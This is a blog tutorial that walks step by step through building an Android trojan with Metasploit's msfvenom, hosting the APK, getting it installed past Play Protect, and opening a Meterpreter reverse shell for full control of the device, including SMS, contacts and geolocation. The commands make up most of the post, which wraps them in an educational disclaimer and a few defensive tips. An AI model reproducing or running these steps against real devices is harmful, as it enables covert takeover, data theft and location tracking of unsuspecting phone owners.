Ethical Hacking 101 - How Can You Hack Into An Android Device ๐Ÿ“ฑ In 2022?

Raghav Mrituanjaya

Cover Image for Ethical Hacking 101 - How Can You Hack Into An Android Device ๐Ÿ“ฑ In 2022?

We will be seeing how can you hack onto your phone in 2022 using the Metasploit Framework. This attack will be done using a Trojan created using Metasploit

Disclaimer:-  This post is only meant to illustrate these attacks and is purely for educational purposes only

What is Metasploit ๐Ÿค” ?

Metasploit is an open-source computer security project maintained and developed by Rapid7. It includes a set of tools that can help a cyber security analyst of an organization to find some bugs in their system and recommend some potential ways to solve them. It usually comes pre-installed in Kali Linux. It contains over 590 sets of modules that are essentially useful. Some of the Important ones are mentioned below

  • Command shell enables users to run collection scripts or run arbitrary commands against the host.
  • Meterpreter (the Metasploit Interpreter) enables users to control the screen of a device using VNC and to browse, upload and download files.
  • Dynamic payloads enable users to evade anti-virus defence by generating unique payloads.
  • Static payloads enable static IP address/port forwarding for communication between the host and the client system

Installing Metasploit

  • You can run the following commands to install Metasploit onto your Linux server
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
  • Metasploit is also available for other OS. You can learn about it by clicking on this here
  • If you are looking for a cloud server to test out Metasploit then, do consider Vultr

Playing with Metasploit ๐Ÿ˜‰

  • For figuring out the public IP of our instance(VM in Cloud) We run wget -qO - ipinfo.io which would fetch you similar output to this  ๐Ÿ‘‡
{
  "ip": "11.22.33.444",
  "hostname": "8.9.8.1.bc.googleusercontent.com",
  "city": "Singapore",
  "region": "Singapore",
  "country": "SG",
  "loc": "1.2897,103.8501",
  "org": "AS396982 Google LLC",
  "postal": "018989",
  "timezone": "Asia/Singapore",
  "readme": "https://ipinfo.io/missingauth"
}
  • The IP field in the JSON should be the public IP of your instance
  • If you're running on your local network then you have to figure out the internal IP of your instance by running ifconfig
  • Before we further process we have to create a Trojan which we can easily create by running the command mentioned below
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.106.0.2 LPORT=4444 R> /var/www/html/payload.apk
  • -p argument indicates the payload that we are going to use. In this case, it will be android/meterpreter/reverse_tcp
  • LHOST will be the host to which you would like to receive the data from the victim. You should change this value to either the public or internal IP of your instance
  • LPORT will be the port to which you want to receive the data from the victim. You could either change this value or use the default which is 4444
  • R> will save the created payload in the specified directory with the specified extension
msfvenom output
  • Now go to the directory where the payload has been generated, In my case,  it will be cd /var/www/html & run python -m SimpleHTTPServer 1234 to spin up a temporary server on port 1234
  • Now you can easily download the APK file onto your phone just by visiting http://private_or_public_ip:1234/filename.apk
  • Once you download the APK and file and try to install the application you might get a similar window popping up where you have to choose the Install anyway option
Blocked By Play Protect
  • Now head over to the instance's terminal and open Metasploit by running msfconsole & run the following commands
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit
  • Please change the value of LHOST & LPORT to the one you configured earlier.
  • Now open the application that you have installed. Ideally, the name should be Main Activity
  • After you open the app, head over to the terminal, and now a new session must be opened wherein you can take full control of the device
Core Commands
  • It also includes some functions that we can use to interact with the Filesystem of the device
  • You may also find some functions to get/send SMS or even get all the contacts
  • To find the list of all the possible commands just run ? or help  
  • Let's see how we can locate the current position of the user but just running one command that is geolocate

Tips to stay away from a Trojan Attack โš”

  • You should not download APKs from untrusted sources
  • In this post, I've just shown to create a Trojan APK but real hackers might merge the trojans with legit Apps and ask us to download the APKs. If you would like to know how can we merge Trojan to another APK file do let me know in the comment section below
  • You should examine the code before you install any opensource applications

P.S:- Vultr(Get a $100 credit by registering using this link) is a good hosting choice if you're looking for one

Thanks for reading till the end. Do let me know if you have any queries in the comment section below ๐Ÿ˜€

Buy Me A Coffee
Ethical Hacking 101 - How Can You Hack Into An Android Device ๐Ÿ“ฑ In 2022? cover image

Raghav Mrituanjaya

ยท min read

Making Your Private VPN๐Ÿ” cover image

Programming

Making Your Private VPN๐Ÿ”

This post explains you in setting up your own private VPN Instance using open-source software(OpenVP...

Raghav Mrituanjaya

ยท min read


ยฉ 2024

THE GOGAMIC BLOG